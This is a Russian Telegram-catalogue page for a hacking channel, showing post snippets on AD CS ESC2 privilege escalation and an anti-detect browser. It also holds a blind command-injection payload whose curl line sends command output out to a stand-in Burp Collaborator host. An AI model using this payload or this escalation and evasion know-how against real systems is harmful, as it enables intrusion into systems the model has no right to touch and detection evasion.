

- Главная
- Каталог
- Интернет технологии
- Hacking & InfoSec Portal
Hacking & InfoSec Portal
Канал, посвещённый кибербезопасности и анонимности
Статистика канала
Полная статистикаchevron_rightможет использоваться для аутентификации без пароля может открыть дорогу к повышению привилегий, вплоть до уровня Domain AdminКогда шаблон считается уязвимым к ESC2: - У обычных пользователей есть права enroll - Не требуется одобрение менеджера - Не нужен авторизованный подписью запрос - EKU (Extended Key Usage) выставлен в Any Purpose или вообще не задан Если EKU пустой, сертификат начинает вести себя как подчиненный центр сертификации: его можно использовать для подписи других сертификатов под любые задачи. Важное уточнение: Такие «подчиненные» сертификаты по умолчанию не доверены для входа в домен. Контроллеры домена принимают сертификаты только от тех CA, что присутствуют в NTAuth. Но это не делает ESC2 безопасным: Злоумышленник все равно может подписывать другие сертификаты, подделывать код-сайнинг или TLS сертификаты, либо использовать enrollment agent шаблоны, чтобы запрашивать полноценные сертификаты для привилегированных аккаунтов - которым уже доверяют. Так ESC2 приводит к полноценной эскалации прав, несмотря на формальные границы доверия. Почему атакующие любят ESC2: - Легко обнаружить - Не нужны админские права - Трудно отследить — нет перебора паролей, нет явных алертов - Сертификаты живут долго, обеспечивая скрытое присутствие Хочешь проверить свою инфраструктуру? Можно использовать: - ADProbe (инструмент для аудита безопасности) - Locksmith - Certipy - …
curl -X POST -d "user=$(whoami)" http://BURP_LINK{}
Иногда цель уязвима, но никакого вывода не вернет. Так что не забывай гонять запросы через Burp Collaborator, чтобы вытащить результат.
Примечание: всегда смотри заголовок User-Agent в ответах Burp Collaborator. Если там всплывает curl, значит у тебя RCE.
Полностью невидим для систем обнаружения ботов. Работает лучше многих коммерческих антидетекционных браузеров; Управление fingerprint'ами: можно загружать и ротировать разные fingerprint'ы без JS; Гибкая конфигурация и калибровка: размер экрана, разрешение, размер окна, fingerprint браузера, аппаратные характеристики и прочее; Спуфинг: геолокация, часовой пояс, локаль; подмена шрифтов; WebRTC-спуфинг IP на уровне протокола; Функция имитации движения мыши, похожая на человеческое поведение; Отсутствие CSS-анимаций, встроенная блокировка рекламы, регулярные обновления Firefox.https://github.com/daijro/camoufox
Отзывы канала
всего 6 отзывов
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
Каталог Телеграм-каналов для нативных размещений
Hacking & InfoSec Portal — это Telegam канал в категории «Интернет технологии», который предлагает эффективные форматы для размещения рекламных постов в Телеграмме. Количество подписчиков канала в 20.4K и качественный контент помогают брендам привлекать внимание аудитории и увеличивать охват. Рейтинг канала составляет 20.0, количество отзывов – 6, со средней оценкой 5.0.
Вы можете запустить рекламную кампанию через сервис Telega.in, выбрав удобный формат размещения. Платформа обеспечивает прозрачные условия сотрудничества и предоставляет детальную аналитику. Стоимость размещения составляет 4895.1 ₽, а за 20 выполненных заявок канал зарекомендовал себя как надежный партнер для рекламы в TG. Размещайте интеграции уже сегодня и привлекайте новых клиентов вместе с Telega.in!
Вы снова сможете добавить каналы в корзину из каталога
Комментарий